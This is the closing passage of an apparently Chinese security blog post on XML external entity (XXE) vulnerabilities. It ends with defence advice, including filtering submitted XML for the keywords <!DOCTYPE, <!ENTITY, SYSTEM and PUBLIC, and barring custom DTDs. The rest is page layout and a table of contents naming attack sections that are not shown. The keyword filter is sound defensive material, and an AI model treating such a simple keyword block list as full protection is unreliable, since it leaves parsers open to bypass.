<h2 id="过滤用户提交的XML数据"><a href="#过滤用户提交的XML数据" class="headerlink" title="过滤用户提交的XML数据"></a>过滤用户提交的XML数据</h2><p>过滤关键字：&lt;!DOCTYPE和&lt;!ENTITY，或者SYSTEM和PUBLIC。</p>
<h2 id="不允许XML中含有自己定义的DTD"><a href="#不允许XML中含有自己定义的DTD" class="headerlink" title="不允许XML中含有自己定义的DTD"></a>不允许XML中含有自己定义的DTD</h2>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/25/内网/" rel="next" title="域渗透练习">
                <i class="fa fa-chevron-left"></i> 域渗透练习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/06/超级玛丽/" rel="prev" title="超级玛丽靶机渗透测试笔记">
                超级玛丽靶机渗透测试笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/ctf/头像.png"
                alt="Hu3sky" />
            
              <p class="site-author-name" itemprop="name">Hu3sky</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#题记"><span class="nav-number">1.</span> <span class="nav-text">题记</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-XXE漏洞"><span class="nav-number">2.</span> <span class="nav-text">0x00 XXE漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-XML"><span class="nav-number">3.</span> <span class="nav-text">0x01 XML</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-DTD"><span class="nav-number">4.</span> <span class="nav-text">0x02 DTD</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD元素"><span class="nav-number">4.1.</span> <span class="nav-text">DTD元素</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD属性"><span class="nav-number">4.2.</span> <span class="nav-text">DTD属性</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD-实体-重要"><span class="nav-number">4.3.</span> <span class="nav-text">DTD-实体(重要)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#内部实体"><span class="nav-number">4.3.1.</span> <span class="nav-text">内部实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#外部实体"><span class="nav-number">4.3.2.</span> <span class="nav-text">外部实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参数实体"><span class="nav-number">4.3.3.</span> <span class="nav-text">参数实体</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-攻击思路"><span class="nav-number">5.</span> <span class="nav-text">0x03 攻击思路</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#外部实体引用-有回显"><span class="nav-number">5.1.</span> <span class="nav-text">外部实体引用,有回显</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#读取任意文件"><span class="nav-number">5.1.1.</span> <span class="nav-text">读取任意文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#例子一"><span class="nav-number">5.1.1.1.</span> <span class="nav-text">例子一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#例子二"><span class="nav-number">5.1.1.2.</span> <span class="nav-text">例子二</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检测内网端口"><span class="nav-number">5.1.2.</span> <span class="nav-text">检测内网端口</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Blind-XXE"><span class="nav-number">5.2.</span> <span class="nav-text">Blind XXE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOS"><span class="nav-number">5.3.</span> <span class="nav-text">DOS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#命令执行"><span class="nav-number">5.4.</span> <span class="nav-text">命令执行</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-防御XXE"><span class="nav-number">6.</span> <span class="nav-text">0x04 防御XXE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#使用开发语言提供的禁用外部实体的方法"><span class="nav-number">6.1.</span> <span class="nav-text">使用开发语言提供的禁用外部实体的方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#过滤用户提交的XML数据"><span class="nav-number">6.2.</span> <span class="nav-text">过滤用户提交的XML数据</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#不允许XML中含有自己定义的DTD"><span class="nav-number">6.3.</span> <span class="nav-text">不允许XML中含有自己定义的DTD</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div>
  友情链接: 
 <div>博客系： 
  <a class="theme-link"  href="http://karmaof.me"> KarmA's blog </a><span>&nbsp;&nbsp;</span>
  <a class="theme-link"  href="https://ratten3anger.github.io"> ratten3anger's blog </a><span>&nbsp;&nbsp;</span>
 </div>
 
</div>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hu3sky</span>

  
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>
    
    <script type="text/javascript" color ="30,50,90" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
    
    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


</body>
</html>
<script type="text/javascript" src="/js/src/love.js"></script>